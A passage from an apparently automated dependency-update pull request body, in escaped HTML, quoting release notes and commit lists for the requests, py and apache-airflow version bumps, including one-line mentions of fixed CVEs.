href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.31.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.23.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.31.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.9.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.9.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `apache-airflow` from 2.6.3 to 2.10.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/airflow/releases\"\u003eapache-airflow's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eApache Airflow 2.10.3\u003c/h2\u003e\n\u003ch1\u003eSignificant Changes\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch2\u003eBug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproves the handling of value masking when setting Airflow variables for enhanced security.  (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43123\"\u003e#43123\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43278\"\u003e#43278\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds support for task_instance_mutation_hook to handle mapped operators with index 0. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42661\"\u003e#42661\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43089\"\u003e#43089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes executor cleanup to properly handle zombie tasks when task instances are terminated. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43065\"\u003e#43065\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds retry logic for HTTP 502 and 504 errors in internal API calls to handle webserver startup issues. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42994\"\u003e#42994\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43044\"\u003e#43044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRestores the use of separate sessions for writing and deleting RTIF data to prevent StaleDataError. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42928\"\u003e#42928\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43012\"\u003e#43012\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes PythonOperator error by replacing hyphens with underscores in DAG names. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42993\"\u003e#42993\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproving validation of task retries to handle None values (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42532\"\u003e#42532\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42915\"\u003e#42915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes error handling in dataset managers when resolving dataset aliases into new datasets (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42733\"\u003e#42733\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnables clicking on task names in the DAG Graph View to correctly select the corresponding task. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/38782\"\u003e#38782\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42697\"\u003e#42697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent redirect loop on /home with tags/last run filters (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42607\"\u003e#42607\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42609\"\u003e#42609\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42628\"\u003e#42628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport of host.name in OTEL metrics and usage of OTEL_RESOURCE_ATTRIBUTES in metrics (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42428\"\u003e#42428\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42604\"\u003e#42604\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReduce eyestrain in dark mode with reduced contrast and saturation (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42567\"\u003e#42567\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42583\"\u003e#42583\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle ENTER key correctly in trigger form and allow manual JSON (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42525\"\u003e#42525\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42535\"\u003e#42535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure DAG trigger form submits with updated parameters upon keyboard submit (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42487\"\u003e#42487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42499\"\u003e#42499\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDo not attempt to provide not \u003ccode\u003estringified\u003c/code\u003e objects to UI via xcom if pickling is active (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42388\"\u003e#42388\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42486\"\u003e#42486\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix the span link of task instance to point to the correct span in the scheduler_job_loop (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42430\"\u003e#42430\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42480\"\u003e#42480\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix task execution from runner in Windows (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42426\"\u003e#42426\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42478\"\u003e#42478\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAllows overriding the hardcoded OTEL_SERVICE_NAME with an environment variable (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42242\"\u003e#42242\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42441\"\u003e#42441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproves trigger performance by using \u003ccode\u003eselectinload\u003c/code\u003e instead of \u003ccode\u003ejoinedload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/40487\"\u003e#40487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42351\"\u003e#42351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSuppress warnings when masking sensitive configs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43335\"\u003e#43335\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43337\"\u003e#43337\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMasking configuration values irrelevant to DAG author (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43040\"\u003e#43040\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43336\"\u003e#43336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eExecute templated bash script as file in BashOperator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43191\"\u003e#43191\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes schedule_downstream_tasks to include upstream tasks for one_success trigger rule (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42582\"\u003e#42582\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43299\"\u003e#43299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd retry logic in the scheduler for updating trigger timeouts in case of deadlocks. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/41429\"\u003e#41429\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42651\"\u003e#42651\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMark all tasks as skipped when failing a dag_run manually (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eTrySelector\u003c/code\u003e for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix broken stat \u003ccode\u003escheduler_loop_duration\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude limit and offset in request body schema for List task instances (batch) endpoint (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43479\"\u003e#43479\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't raise a warning in ExecutorSafeguard when execute is called from an extended operator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42849\"\u003e#42849\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43577\"\u003e#43577\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMiscellaneous\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate session auth backend (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42911\"\u003e#42911\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved unicodecsv dependency for providers with Airflow version 2.8.0 and above (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42765\"\u003e#42765\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42970\"\u003e#42970\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove the referrer from Webserver to Scarf (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42901\"\u003e#42901\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42942\"\u003e#42942\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBump \u003ccode\u003edompurify\u003c/code\u003e from 2.2.9 to 2.5.6 in /airflow/www (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42263\"\u003e#42263\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42270\"\u003e#42270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCorrect docstring format in _get_template_context (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42244\"\u003e#42244\u003c/a\u003e) 